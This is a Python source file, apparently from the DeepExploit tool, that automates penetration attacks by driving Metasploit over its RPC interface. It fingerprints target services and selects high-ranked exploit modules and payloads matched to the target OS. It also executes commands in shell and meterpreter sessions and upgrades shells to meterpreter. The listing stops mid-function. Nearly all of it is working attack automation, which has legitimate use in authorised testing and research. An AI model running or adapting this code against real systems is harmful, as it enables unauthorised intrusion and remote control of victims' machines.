└── DeepExploit-GAILDPPO.py /DeepExploit-GAILDPPO.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | import os 5 | import time 6 | import re 7 | import copy 8 | import json 9 | import csv 10 | import codecs 11 | import random 12 | import ipaddress 13 | import configparser 14 | import msgpack 15 | import http.client 16 | import threading 17 | import numpy as np 18 | import pandas as pd 19 | import tensorflow as tf 20 | import matplotlib.pyplot as plt 21 | import datetime 22 | from bs4 import BeautifulSoup 23 | from docopt import docopt 24 | from keras.models import * 25 | from keras.layers import * 26 | from keras import backend as K 27 | from util import Utilty 28 | from modules.VersionChecker import VersionChecker 29 | from modules.VersionCheckerML import VersionCheckerML 30 | from modules.ContentExplorer import ContentExplorer 31 | from CreateReport import CreateReport 32 | # Suppress TensorFlow acceleration warnings. 33 | os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' 34 | 35 | # Index of target host's state (s). 36 | ST_OS_TYPE = 0 # OS types (unix, linux, windows, osx..). 37 | ST_SERV_NAME = 1 # Product name on Port. 38 | ST_SERV_VER = 2 # Product version. 39 | ST_MODULE = 3 # Exploit module types. 40 | ST_TARGET = 4 # Target types (0, 1, 2..). 41 | # ST_STAGE = 5 # exploit's stage (normal, exploitation, post-exploitation). 42 | NUM_STATES = 5 # Size of state. 43 | NONE_STATE = None 44 | NUM_ACTIONS = 0 45 | 46 | # Reward 47 | R_GREAT = 10 # Successful Stager/Stage payload. 48 | R_GOOD = 1 # Successful Single payload. 49 | R_BAD = -1 # Failure of payload. 50 | 51 | # Stage of exploitation 52 | S_NORMAL = -1 53 | S_EXPLOIT = 0 54 | S_PEXPLOIT = 1 55 | 56 | # Label type of printing. 57 | OK = 'ok' # [*] 58 | NOTE = 'note' # [+] 59 | FAIL = 'fail' # [-] 60 | WARNING = 'warn' # [!] 61 | NONE = 'none' # No label. 62 | 63 | 64 | # Metasploit interface. 65 | class Msgrpc: 66 | def __init__(self, option={}): 67 | self.host = option.get('host') or "127.0.0.1" 68 | self.port = option.get('port') or 55552 69 | self.uri = option.get('uri') or "/api/" 70 | self.ssl = option.get('ssl') or False 71 | self.authenticated = False 72 | self.token = False 73 | self.headers = {"Content-type": "binary/message-pack"} 74 | if self.ssl: 75 | self.client = http.client.HTTPSConnection(self.host, self.port) 76 | else: 77 | self.client = http.client.HTTPConnection(self.host, self.port) 78 | self.util = Utilty() 79 | 80 | # Read config.ini. 81 | full_path = os.path.dirname(os.path.abspath(__file__)) 82 | config = configparser.ConfigParser() 83 | try: 84 | config.read(os.path.join(full_path, 'config.ini')) 85 | except FileExistsError as err: 86 | self.util.print_message(FAIL, 'File exists error: {}'.format(err)) 87 | sys.exit(1) 88 | # Common setting value. 89 | self.msgrpc_user = config['Common']['msgrpc_user'] 90 | self.msgrpc_pass = config['Common']['msgrpc_pass'] 91 | self.timeout = int(config['Common']['timeout']) 92 | self.con_retry = int(config['Common']['con_retry']) 93 | self.retry_count = 0 94 | self.console_id = 0 95 | 96 | # Call RPC API. 97 | def call(self, meth, origin_option): 98 | # Set API option. 99 | option = copy.deepcopy(origin_option) 100 | option = self.set_api_option(meth, option) 101 | 102 | # Send request.
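        # The request is the option list serialized with MessagePack and POSTed to
        # self.uri ('/api/' by default). At this point the list looks like
        # ['module.exploits', <token>] or, for login, ['auth.login', user, password].
        # The unpacked response is a dict keyed by byte strings, for example
        # {b'result': b'success', b'token': b'TEMP...'} (values shown are illustrative).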
103 | resp = self.send_request(meth, option, origin_option) 104 | return msgpack.unpackb(resp.read()) 105 | 106 | def set_api_option(self, meth, option): 107 | if meth != 'auth.login': 108 | if not self.authenticated: 109 | self.util.print_message(FAIL, 'MsfRPC: Not Authenticated.') 110 | exit(1) 111 | if meth != 'auth.login': 112 | option.insert(0, self.token) 113 | option.insert(0, meth) 114 | return option 115 | 116 | # Send HTTP request. 117 | def send_request(self, meth, option, origin_option): 118 | params = msgpack.packb(option) 119 | resp = '' 120 | try: 121 | self.client.request("POST", self.uri, params, self.headers) 122 | resp = self.client.getresponse() 123 | self.retry_count = 0 124 | except Exception as err: 125 | while True: 126 | self.retry_count += 1 127 | if self.retry_count == self.con_retry: 128 | self.util.print_exception(err, 'Retry count is over.') 129 | exit(1) 130 | else: 131 | # Retry. 132 | self.util.print_message(WARNING, '{}/{} Retry "{}" call. reason: {}'.format( 133 | self.retry_count, self.con_retry, option[0], err)) 134 | time.sleep(1.0) 135 | if self.ssl: 136 | self.client = http.client.HTTPSConnection(self.host, self.port) 137 | else: 138 | self.client = http.client.HTTPConnection(self.host, self.port) 139 | if meth != 'auth.login': 140 | self.login(self.msgrpc_user, self.msgrpc_pass) 141 | option = self.set_api_option(meth, origin_option) 142 | self.get_console() 143 | resp = self.send_request(meth, option, origin_option) 144 | break 145 | return resp 146 | 147 | # Log in to RPC Server. 148 | def login(self, user, password): 149 | ret = self.call('auth.login', [user, password]) 150 | try: 151 | if ret.get(b'result') == b'success': 152 | self.authenticated = True 153 | self.token = ret.get(b'token') 154 | return True 155 | else: 156 | self.util.print_message(FAIL, 'MsfRPC: Authentication failed.') 157 | exit(1) 158 | except Exception as e: 159 | self.util.print_exception(e, 'Failed: auth.login') 160 | exit(1) 161 | 162 | # Keep alive. 163 | def keep_alive(self): 164 | self.util.print_message(OK, 'Executing keep_alive..') 165 | _ = self.send_command(self.console_id, 'version\n', False) 166 | 167 | # Create MSFconsole. 168 | def get_console(self): 169 | # Create a console. 170 | ret = self.call('console.create', []) 171 | try: 172 | self.console_id = ret.get(b'id') 173 | _ = self.call('console.read', [self.console_id]) 174 | except Exception as err: 175 | self.util.print_exception(err, 'Failed: console.create') 176 | exit(1) 177 | 178 | # Send Metasploit command. 179 | def send_command(self, console_id, command, visualization, sleep=0.1): 180 | _ = self.call('console.write', [console_id, command]) 181 | time.sleep(0.5) 182 | ret = self.call('console.read', [console_id]) 183 | time.sleep(sleep) 184 | result = '' 185 | try: 186 | result = ret.get(b'data').decode('utf-8') 187 | if visualization: 188 | self.util.print_message(OK, 'Result of "{}":\n{}'.format(command, result)) 189 | except Exception as e: 190 | self.util.print_exception(e, 'Failed: {}'.format(command)) 191 | return result 192 | 193 | # Get all modules. 
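    # Each of the module.* list calls below returns a MessagePack map whose useful
    # payload is ret[b'modules']: a list of byte strings naming modules without the
    # type prefix (e.g. b'multi/http/struts2_content_type_ognl' for an exploit),
    # which is why the names are decoded here and later prefixed with 'exploit/'
    # when used in the console.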
194 | def get_module_list(self, module_type): 195 | ret = {} 196 | if module_type == 'exploit': 197 | ret = self.call('module.exploits', []) 198 | elif module_type == 'auxiliary': 199 | ret = self.call('module.auxiliary', []) 200 | elif module_type == 'post': 201 | ret = self.call('module.post', []) 202 | elif module_type == 'payload': 203 | ret = self.call('module.payloads', []) 204 | elif module_type == 'encoder': 205 | ret = self.call('module.encoders', []) 206 | elif module_type == 'nop': 207 | ret = self.call('module.nops', []) 208 | 209 | try: 210 | byte_list = ret[b'modules'] 211 | string_list = [] 212 | for module in byte_list: 213 | string_list.append(module.decode('utf-8')) 214 | return string_list 215 | except Exception as e: 216 | self.util.print_exception(e, 'Failed: Getting {} module list.'.format(module_type)) 217 | exit(1) 218 | 219 | # Get module detail information. 220 | def get_module_info(self, module_type, module_name): 221 | return self.call('module.info', [module_type, module_name]) 222 | 223 | # Get payloads compatible with the module. 224 | def get_compatible_payload_list(self, module_name): 225 | ret = self.call('module.compatible_payloads', [module_name]) 226 | try: 227 | byte_list = ret[b'payloads'] 228 | string_list = [] 229 | for module in byte_list: 230 | string_list.append(module.decode('utf-8')) 231 | return string_list 232 | except Exception as e: 233 | self.util.print_exception(e, 'Failed: module.compatible_payloads.') 234 | return [] 235 | 236 | # Get payloads compatible with the target. 237 | def get_target_compatible_payload_list(self, module_name, target_num): 238 | ret = self.call('module.target_compatible_payloads', [module_name, target_num]) 239 | try: 240 | byte_list = ret[b'payloads'] 241 | string_list = [] 242 | for module in byte_list: 243 | string_list.append(module.decode('utf-8')) 244 | return string_list 245 | except Exception as e: 246 | self.util.print_exception(e, 'Failed: module.target_compatible_payloads.') 247 | return [] 248 | 249 | # Get module options. 250 | def get_module_options(self, module_type, module_name): 251 | return self.call('module.options', [module_type, module_name]) 252 | 253 | # Execute module. 254 | def execute_module(self, module_type, module_name, options): 255 | ret = self.call('module.execute', [module_type, module_name, options]) 256 | try: 257 | job_id = ret[b'job_id'] 258 | uuid = ret[b'uuid'].decode('utf-8') 259 | return job_id, uuid 260 | except Exception as e: 261 | if ret.get(b'error_code') == 401: 262 | self.login(self.msgrpc_user, self.msgrpc_pass) 263 | return self.execute_module(module_type, module_name, options) # Retry after re-authentication. 264 | self.util.print_exception(e, 'Failed: module.execute.') 265 | exit(1) 266 | 267 | # Get job list. 268 | def get_job_list(self): 269 | jobs = self.call('job.list', []) 270 | try: 271 | byte_list = jobs.keys() 272 | job_list = [] 273 | for job_id in byte_list: 274 | job_list.append(int(job_id.decode('utf-8'))) 275 | return job_list 276 | except Exception as e: 277 | self.util.print_exception(e, 'Failed: job.list.') 278 | return [] 279 | 280 | # Get job detail information. 281 | def get_job_info(self, job_id): 282 | return self.call('job.info', [job_id]) 283 | 284 | # Stop job. 285 | def stop_job(self, job_id): 286 | return self.call('job.stop', [job_id]) 287 | 288 | # Get session list. 289 | def get_session_list(self): 290 | return self.call('session.list', []) 291 | 292 | # Stop session. 293 | def stop_session(self, session_id): 294 | _ = self.call('session.stop', [str(session_id)]) 295 | 296 | # Stop meterpreter session.
297 | def stop_meterpreter_session(self, session_id): 298 | _ = self.call('session.meterpreter_session_detach', [str(session_id)]) 299 | 300 | # Execute shell. 301 | def execute_shell(self, session_id, cmd): 302 | ret = self.call('session.shell_write', [str(session_id), cmd]) 303 | try: 304 | return ret[b'write_count'].decode('utf-8') 305 | except Exception as e: 306 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 307 | return 'Failed' 308 | 309 | # Get executing shell result. 310 | def get_shell_result(self, session_id, read_pointer): 311 | ret = self.call('session.shell_read', [str(session_id), read_pointer]) 312 | try: 313 | seq = ret[b'seq'].decode('utf-8') 314 | data = ret[b'data'].decode('utf-8') 315 | return seq, data 316 | except Exception as e: 317 | self.util.print_exception(e, 'Failed: session.shell_read.') 318 | return 0, 'Failed' 319 | 320 | # Execute meterpreter. 321 | def execute_meterpreter(self, session_id, cmd): 322 | ret = self.call('session.meterpreter_write', [str(session_id), cmd]) 323 | try: 324 | return ret[b'result'].decode('utf-8') 325 | except Exception as e: 326 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 327 | return 'Failed' 328 | 329 | # Execute single meterpreter. 330 | def execute_meterpreter_run_single(self, session_id, cmd): 331 | ret = self.call('session.meterpreter_run_single', [str(session_id), cmd]) 332 | try: 333 | return ret[b'result'].decode('utf-8') 334 | except Exception as e: 335 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 336 | return 'Failed' 337 | 338 | # Get executing meterpreter result. 339 | def get_meterpreter_result(self, session_id): 340 | ret = self.call('session.meterpreter_read', [str(session_id)]) 341 | try: 342 | return ret[b'data'].decode('utf-8') 343 | except Exception as e: 344 | self.util.print_exception(e, 'Failed: session.meterpreter_read') 345 | return None 346 | 347 | # Upgrade shell session to meterpreter. 348 | def upgrade_shell_session(self, session_id, lhost, lport): 349 | ret = self.call('session.shell_upgrade', [str(session_id), lhost, lport]) 350 | try: 351 | return ret[b'result'].decode('utf-8') 352 | except Exception as e: 353 | self.util.print_exception(e, 'Failed: session.shell_upgrade') 354 | return 'Failed' 355 | 356 | # Log out from RPC Server. 357 | def logout(self): 358 | ret = self.call('auth.logout', [self.token]) 359 | try: 360 | if ret.get(b'result') == b'success': 361 | self.authenticated = False 362 | self.token = '' 363 | return True 364 | else: 365 | self.util.print_message(FAIL, 'MsfRPC: Authentication failed.') 366 | exit(1) 367 | except Exception as e: 368 | self.util.print_exception(e, 'Failed: auth.logout') 369 | exit(1) 370 | 371 | # Disconnection. 372 | def termination(self, console_id): 373 | # Kill a console and Log out. 374 | _ = self.call('console.session_kill', [console_id]) 375 | _ = self.logout() 376 | 377 | 378 | # Metasploit's environment. 379 | class Metasploit: 380 | def __init__(self, target_ip='127.0.0.1'): 381 | self.util = Utilty() 382 | self.rhost = target_ip 383 | # Read config.ini. 384 | full_path = os.path.dirname(os.path.abspath(__file__)) 385 | config = configparser.ConfigParser() 386 | try: 387 | config.read(os.path.join(full_path, 'config.ini')) 388 | except FileExistsError as err: 389 | self.util.print_message(FAIL, 'File exists error: {}'.format(err)) 390 | sys.exit(1) 391 | # Common setting value. 
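        # The [Common] section of config.ini is expected to provide at least the
        # keys read below; an illustrative (not authoritative) fragment:
        #
        #   [Common]
        #   server_host : 127.0.0.1
        #   server_port : 55553
        #   msgrpc_user : test
        #   msgrpc_pass : test1234
        #   timeout     : 100
        #   max_attempt : 10
        #   save_path   : trained_data
        #   save_file   : DeepExploit.ckpt
        #   data_path   : data
        #   plot_file   : experiment.png
        #   port_div    : @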
392 | server_host = config['Common']['server_host'] 393 | server_port = int(config['Common']['server_port']) 394 | self.msgrpc_user = config['Common']['msgrpc_user'] 395 | self.msgrpc_pass = config['Common']['msgrpc_pass'] 396 | self.timeout = int(config['Common']['timeout']) 397 | self.max_attempt = int(config['Common']['max_attempt']) 398 | self.save_path = os.path.join(full_path, config['Common']['save_path']) 399 | self.save_file = os.path.join(self.save_path, config['Common']['save_file']) 400 | self.data_path = os.path.join(full_path, config['Common']['data_path']) 401 | if os.path.exists(self.data_path) is False: 402 | os.mkdir(self.data_path) 403 | self.plot_file = os.path.join(self.data_path, config['Common']['plot_file']) 404 | self.port_div_symbol = config['Common']['port_div'] 405 | 406 | # Metasploit options setting value. 407 | self.lhost = server_host 408 | self.lport = int(config['Metasploit']['lport']) 409 | self.proxy_host = config['Metasploit']['proxy_host'] 410 | self.proxy_port = int(config['Metasploit']['proxy_port']) 411 | self.prohibited_list = str(config['Metasploit']['prohibited_list']).split('@') 412 | self.path_collection = str(config['Metasploit']['path_collection']).split('@') 413 | 414 | # Nmap options setting value. 415 | self.nmap_command = config['Nmap']['command'] 416 | self.nmap_timeout = config['Nmap']['timeout'] 417 | self.nmap_2nd_command = config['Nmap']['second_command'] 418 | self.nmap_2nd_timeout = config['Nmap']['second_timeout'] 419 | 420 | # A3C setting value. 421 | self.train_worker_num = int(config['A3C']['train_worker_num']) 422 | self.train_max_num = int(config['A3C']['train_max_num']) 423 | self.train_max_steps = int(config['A3C']['train_max_steps']) 424 | self.train_tmax = int(config['A3C']['train_tmax']) 425 | self.test_worker_num = int(config['A3C']['test_worker_num']) 426 | self.greedy_rate = float(config['A3C']['greedy_rate']) 427 | self.eps_steps = int(self.train_max_num * self.greedy_rate) 428 | 429 | # State setting value. 430 | self.state = [] # Deep Exploit's state(s). 431 | self.os_type = str(config['State']['os_type']).split('@') # OS type. 432 | self.os_real = len(self.os_type) - 1 433 | self.service_list = str(config['State']['services']).split('@') # Product name. 434 | 435 | # Report setting value. 436 | self.report_test_path = os.path.join(full_path, config['Report']['report_test']) 437 | self.report_train_path = os.path.join(self.report_test_path, config['Report']['report_train']) 438 | if os.path.exists(self.report_train_path) is False: 439 | os.mkdir(self.report_train_path) 440 | self.scan_start_time = self.util.get_current_date() 441 | self.source_host= server_host 442 | 443 | self.client = Msgrpc({'host': server_host, 'port': server_port}) # Create Msgrpc instance. 444 | self.client.login(self.msgrpc_user, self.msgrpc_pass) # Log in to RPC Server. 445 | self.client.get_console() # Get MSFconsole ID. 446 | self.buffer_seq = 0 447 | self.isPostExploit = False # Executing Post-Exploiting True/False. 448 | 449 | # Create exploit tree. 450 | def get_exploit_tree(self): 451 | self.util.print_message(NOTE, 'Get exploit tree.') 452 | exploit_tree = {} 453 | if os.path.exists(os.path.join(self.data_path, 'exploit_tree.json')) is False: 454 | for idx, exploit in enumerate(com_exploit_list): 455 | temp_target_tree = {'targets': []} 456 | temp_tree = {} 457 | # Set exploit module. 458 | use_cmd = 'use exploit/' + exploit + '\n' 459 | _ = self.client.send_command(self.client.console_id, use_cmd, False) 460 | 461 | # Get target. 
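                # The 'show targets' output scraped from the console typically looks like:
                #
                #   Exploit targets:
                #
                #      Id  Name
                #      --  ----
                #      0   Automatic
                #      1   Windows 2000 SP4
                #
                # (names are illustrative). The regex below extracts the numeric Id
                # column; each Id is then passed to module.target_compatible_payloads.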
462 | show_cmd = 'show targets\n' 463 | target_info = '' 464 | time_count = 0 465 | while True: 466 | target_info = self.client.send_command(self.client.console_id, show_cmd, False) 467 | if 'Exploit targets' in target_info: 468 | break 469 | if time_count == 5: 470 | self.util.print_message(OK, 'Timeout: {0}'.format(show_cmd)) 471 | self.util.print_message(OK, 'No exist Targets.') 472 | break 473 | time.sleep(1.0) 474 | time_count += 1 475 | target_list = self.cutting_strings(r'\s*([0-9]{1,3}) .*[a-z|A-Z|0-9].*[\r\n]', target_info) 476 | for target in target_list: 477 | # Get payload list. 478 | payload_list = self.client.get_target_compatible_payload_list(exploit, int(target)) 479 | temp_tree[target] = payload_list 480 | 481 | # Get options. 482 | options = self.client.get_module_options('exploit', exploit) 483 | key_list = options.keys() 484 | option = {} 485 | for key in key_list: 486 | sub_option = {} 487 | sub_key_list = options[key].keys() 488 | for sub_key in sub_key_list: 489 | if isinstance(options[key][sub_key], list): 490 | end_option = [] 491 | for end_key in options[key][sub_key]: 492 | end_option.append(end_key.decode('utf-8')) 493 | sub_option[sub_key.decode('utf-8')] = end_option 494 | else: 495 | end_option = {} 496 | if isinstance(options[key][sub_key], bytes): 497 | sub_option[sub_key.decode('utf-8')] = options[key][sub_key].decode('utf-8') 498 | else: 499 | sub_option[sub_key.decode('utf-8')] = options[key][sub_key] 500 | 501 | # User specify. 502 | sub_option['user_specify'] = "" 503 | option[key.decode('utf-8')] = sub_option 504 | 505 | # Add payloads and targets to exploit tree. 506 | temp_target_tree['target_list'] = target_list 507 | temp_target_tree['targets'] = temp_tree 508 | temp_target_tree['options'] = option 509 | exploit_tree[exploit] = temp_target_tree 510 | # Output processing status to console. 511 | self.util.print_message(OK, '{}/{} exploit:{}, targets:{}'.format(str(idx + 1), 512 | len(com_exploit_list), 513 | exploit, 514 | len(target_list))) 515 | 516 | # Save exploit tree to local file. 517 | fout = codecs.open(os.path.join(self.data_path, 'exploit_tree.json'), 'w', 'utf-8') 518 | json.dump(exploit_tree, fout, indent=4) 519 | fout.close() 520 | self.util.print_message(OK, 'Saved exploit tree.') 521 | else: 522 | # Get exploit tree from local file. 523 | local_file = os.path.join(self.data_path, 'exploit_tree.json') 524 | self.util.print_message(OK, 'Loaded exploit tree from : {}'.format(local_file)) 525 | fin = codecs.open(local_file, 'r', 'utf-8') 526 | exploit_tree = json.loads(fin.read().replace('\0', '')) 527 | fin.close() 528 | return exploit_tree 529 | 530 | # Get target host information. 531 | def get_target_info(self, rhost, proto_list, port_info): 532 | self.util.print_message(NOTE, 'Get target info.') 533 | target_tree = {} 534 | if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False: 535 | # Examination product and version on the Web ports. 536 | path_list = ['' for idx in range(len(com_port_list))] 537 | # TODO: Crawling on the Post-Exploitation phase. 538 | if self.isPostExploit is False: 539 | # Create instances. 540 | version_checker = VersionChecker(self.util) 541 | version_checker_ml = VersionCheckerML(self.util) 542 | content_explorer = ContentExplorer(self.util) 543 | 544 | # Check web port. 545 | web_port_list = self.util.check_web_port(rhost, com_port_list, self.client) 546 | 547 | # Gather target url using Spider. 
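                # run_spider() (util.py) returns one entry per crawled web port; the code
                # below only relies on target[0] being a parsable base URL and target[2]
                # being the list of crawled URLs, so treat that indexing as the contract
                # assumed here rather than a documented API.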
548 | web_target_info = self.util.run_spider(rhost, web_port_list, self.client) 549 | 550 | # Get HTTP responses and check products per web port. 551 | uniq_product = [] 552 | for idx_target, target in enumerate(web_target_info): 553 | web_prod_list = [] 554 | # Scramble. 555 | target_list = target[2] 556 | if self.util.is_scramble is True: 557 | self.util.print_message(WARNING, 'Scramble target list.') 558 | target_list = random.sample(target[2], len(target[2])) 559 | 560 | # Cut the number of target URLs. 561 | if self.util.max_target_url != 0 and self.util.max_target_url < len(target_list): 562 | self.util.print_message(WARNING, 'Cutting target list {} to {}.' 563 | .format(len(target[2]), self.util.max_target_url)) 564 | target_list = target_list[:self.util.max_target_url] 565 | 566 | # Identify product name/version per target url. 567 | for count, target_url in enumerate(target_list): 568 | self.util.print_message(NOTE, '{}/{} Start analyzing: {}' 569 | .format(count + 1, len(target_list), target_url)) 570 | self.client.keep_alive() 571 | 572 | # Check target url. 573 | parsed = self.util.parse_url(target_url) 574 | if parsed is None: 575 | continue 576 | 577 | # Get HTTP response (header + body). 578 | _, res_header, res_body = self.util.send_request('GET', target_url) 579 | 580 | # Cut the response body size. 581 | if self.util.max_target_byte != 0 and (self.util.max_target_byte < len(res_body)): 582 | self.util.print_message(WARNING, 'Cutting response byte {} to {}.' 583 | .format(len(res_body), self.util.max_target_byte)) 584 | res_body = res_body[:self.util.max_target_byte] 585 | 586 | # Check product name/version using signature. 587 | web_prod_list.extend(version_checker.get_product_name(parsed, 588 | res_header + res_body, 589 | self.client)) 590 | 591 | # Check product name/version using Machine Learning. 592 | web_prod_list.extend(version_checker_ml.get_product_name(parsed, 593 | res_header + res_body, 594 | self.client)) 595 | 596 | # Check product name/version using default contents. 597 | parsed = None 598 | try: 599 | parsed = self.util.parse_url(target[0]) 600 | except Exception as e: 601 | self.util.print_exception(e, 'Parse error: {}'.format(target[0])) 602 | continue 603 | web_prod_list.extend(content_explorer.content_explorer(parsed, target[0], self.client)) 604 | 605 | # Remove duplicates. 606 | tmp_list = [] 607 | for item in list(set(web_prod_list)): 608 | tmp_item = item.split('@') 609 | tmp = tmp_item[0] + ' ' + tmp_item[1] + ' ' + tmp_item[2] 610 | if tmp not in tmp_list: 611 | tmp_list.append(tmp) 612 | uniq_product.append(item) 613 | 614 | # Assemble web product information. 615 | for idx, web_prod in enumerate(uniq_product): 616 | web_item = web_prod.split('@') 617 | proto_list.append('tcp') 618 | port_info.append(web_item[0] + ' ' + web_item[1]) 619 | com_port_list.append(web_item[2] + self.port_div_symbol + str(idx)) 620 | path_list.append(web_item[3]) 621 | 622 | # Create target info. 623 | target_tree = {'rhost': rhost, 'os_type': self.os_real} 624 | for port_idx, port_num in enumerate(com_port_list): 625 | temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'target_path': '', 'exploit': []} 626 | 627 | # Get product name. 628 | service_name = 'unknown' 629 | for (idx, service) in enumerate(self.service_list): 630 | if service in port_info[port_idx].lower(): 631 | service_name = service 632 | break 633 | temp_tree['prod_name'] = service_name 634 | 635 | # Get product version.
636 | # idx=1 2.3.4, idx=2 4.7p1, idx=3 1.0.1f, idx4 2.0 or v1.3 idx5 3.X 637 | regex_list = [r'.*\s(\d{1,3}\.\d{1,3}\.\d{1,3}).*', 638 | r'.*\s[a-z]?(\d{1,3}\.\d{1,3}[a-z]\d{1,3}).*', 639 | r'.*\s[\w]?(\d{1,3}\.\d{1,3}\.\d[a-z]{1,3}).*', 640 | r'.*\s[a-z]?(\d\.\d).*', 641 | r'.*\s(\d\.[xX|\*]).*'] 642 | version = 0.0 643 | output_version = 0.0 644 | for (idx, regex) in enumerate(regex_list): 645 | version_raw = self.cutting_strings(regex, port_info[port_idx]) 646 | if len(version_raw) == 0: 647 | continue 648 | if idx == 0: 649 | index = version_raw[0].rfind('.') 650 | version = version_raw[0][:index] + version_raw[0][index + 1:] 651 | output_version = version_raw[0] 652 | break 653 | elif idx == 1: 654 | index = re.search(r'[a-z]', version_raw[0]).start() 655 | version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:] 656 | output_version = version_raw[0] 657 | break 658 | elif idx == 2: 659 | index = re.search(r'[a-z]', version_raw[0]).start() 660 | version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:] 661 | index = version.rfind('.') 662 | version = version_raw[0][:index] + version_raw[0][index:] 663 | output_version = version_raw[0] 664 | break 665 | elif idx == 3: 666 | version = self.cutting_strings(r'[a-z]?(\d\.\d)', version_raw[0]) 667 | version = version[0] 668 | output_version = version_raw[0] 669 | break 670 | elif idx == 4: 671 | version = version_raw[0].replace('X', '0').replace('x', '0').replace('*', '0') 672 | version = version[0] 673 | output_version = version_raw[0] 674 | temp_tree['version'] = float(version) 675 | 676 | # Get protocol type. 677 | temp_tree['protocol'] = proto_list[port_idx] 678 | 679 | if path_list is not None: 680 | temp_tree['target_path'] = path_list[port_idx] 681 | 682 | # Get exploit module. 683 | module_list = [] 684 | raw_module_info = '' 685 | idx = 0 686 | search_cmd = 'search name:' + service_name + ' type:exploit app:server\n' 687 | raw_module_info = self.client.send_command(self.client.console_id, search_cmd, False, 3.0) 688 | module_list = self.extract_osmatch_module(self.cutting_strings(r'(exploit/.*)', raw_module_info)) 689 | if service_name != 'unknown' and len(module_list) == 0: 690 | self.util.print_message(WARNING, 'Can\'t load exploit module: {}'.format(service_name)) 691 | temp_tree['prod_name'] = 'unknown' 692 | 693 | for module in module_list: 694 | if module[1] in {'excellent', 'great', 'good'}: 695 | temp_tree['exploit'].append(module[0]) 696 | target_tree[str(port_num)] = temp_tree 697 | 698 | # Output processing status to console. 699 | self.util.print_message(OK, 'Analyzing port {}/{}, {}/{}, ' 700 | 'Available exploit modules:{}'.format(port_num, 701 | temp_tree['protocol'], 702 | temp_tree['prod_name'], 703 | output_version, 704 | len(temp_tree['exploit']))) 705 | 706 | # Save target host information to local file. 707 | fout = codecs.open(os.path.join(self.data_path, 'target_info_' + rhost + '.json'), 'w', 'utf-8') 708 | json.dump(target_tree, fout, indent=4) 709 | fout.close() 710 | self.util.print_message(OK, 'Saved target tree.') 711 | else: 712 | # Get target host information from local file. 
713 | saved_file = os.path.join(self.data_path, 'target_info_' + rhost + '.json') 714 | self.util.print_message(OK, 'Loaded target tree from : {}'.format(saved_file)) 715 | fin = codecs.open(saved_file, 'r', 'utf-8') 716 | target_tree = json.loads(fin.read().replace('\0', '')) 717 | fin.close() 718 | 719 | return target_tree 720 | 721 | # Get target host information for indicate port number. 722 | def get_target_info_indicate(self, rhost, proto_list, port_info, port=None, prod_name=None): 723 | self.util.print_message(NOTE, 'Get target info for indicate port number.') 724 | target_tree = {'origin_port': port} 725 | 726 | # Update "com_port_list". 727 | com_port_list = [] 728 | for prod in prod_name.split('@'): 729 | temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'exploit': []} 730 | virtual_port = str(np.random.randint(999999999)) 731 | com_port_list.append(virtual_port) 732 | 733 | # Get product name. 734 | service_name = 'unknown' 735 | for (idx, service) in enumerate(self.service_list): 736 | if service == prod.lower(): 737 | service_name = service 738 | break 739 | temp_tree['prod_name'] = service_name 740 | 741 | # Get product version. 742 | temp_tree['version'] = float(0.0) 743 | 744 | # Get protocol type. 745 | temp_tree['protocol'] = 'tcp' 746 | 747 | # Get exploit module. 748 | module_list = [] 749 | raw_module_info = '' 750 | idx = 0 751 | search_cmd = 'search name:' + service_name + ' type:exploit app:server\n' 752 | raw_module_info = self.client.send_command(self.client.console_id, search_cmd, False, 3.0) 753 | module_list = self.cutting_strings(r'(exploit/.*)', raw_module_info) 754 | if service_name != 'unknown' and len(module_list) == 0: 755 | continue 756 | for exploit in module_list: 757 | raw_exploit_info = exploit.split(' ') 758 | exploit_info = list(filter(lambda s: s != '', raw_exploit_info)) 759 | if exploit_info[2] in {'excellent', 'great', 'good'}: 760 | temp_tree['exploit'].append(exploit_info[0]) 761 | target_tree[virtual_port] = temp_tree 762 | 763 | # Output processing status to console. 764 | self.util.print_message(OK, 'Analyzing port {}/{}, {}, ' 765 | 'Available exploit modules:{}'.format(port, 766 | temp_tree['protocol'], 767 | temp_tree['prod_name'], 768 | len(temp_tree['exploit']))) 769 | 770 | # Save target host information to local file. 771 | with codecs.open(os.path.join(self.data_path, 'target_info_indicate_' + rhost + '.json'), 'w', 'utf-8') as fout: 772 | json.dump(target_tree, fout, indent=4) 773 | 774 | return target_tree, com_port_list 775 | 776 | # Get target OS name. 
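    # extract_osmatch_module() keeps only modules whose platform segment (the first
    # path element after 'exploit/', e.g. 'windows', 'linux', 'multi') is plausible
    # for the OS index detected by Nmap (self.os_real). The branches amount to a
    # lookup table, roughly:
    #
    #   0 (windows) -> {windows, multi}        5 (linux)    -> {linux, unix, multi}
    #   3 (osx)     -> {osx, unix, multi}      15 (unknown) -> any platform
    #
    # with the index order following the os_type list in config.ini.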
777 | def extract_osmatch_module(self, module_list): 778 | osmatch_module_list = [] 779 | for module in module_list: 780 | raw_exploit_info = module.split(' ') 781 | exploit_info = list(filter(lambda s: s != '', raw_exploit_info)) 782 | os_type = exploit_info[0].split('/')[1] 783 | if self.os_real == 0 and os_type in ['windows', 'multi']: 784 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 785 | elif self.os_real == 1 and os_type in ['unix', 'freebsd', 'bsdi', 'linux', 'multi']: 786 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 787 | elif self.os_real == 2 and os_type in ['solaris', 'unix', 'multi']: 788 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 789 | elif self.os_real == 3 and os_type in ['osx', 'unix', 'multi']: 790 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 791 | elif self.os_real == 4 and os_type in ['netware', 'multi']: 792 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 793 | elif self.os_real == 5 and os_type in ['linux', 'unix', 'multi']: 794 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 795 | elif self.os_real == 6 and os_type in ['irix', 'unix', 'multi']: 796 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 797 | elif 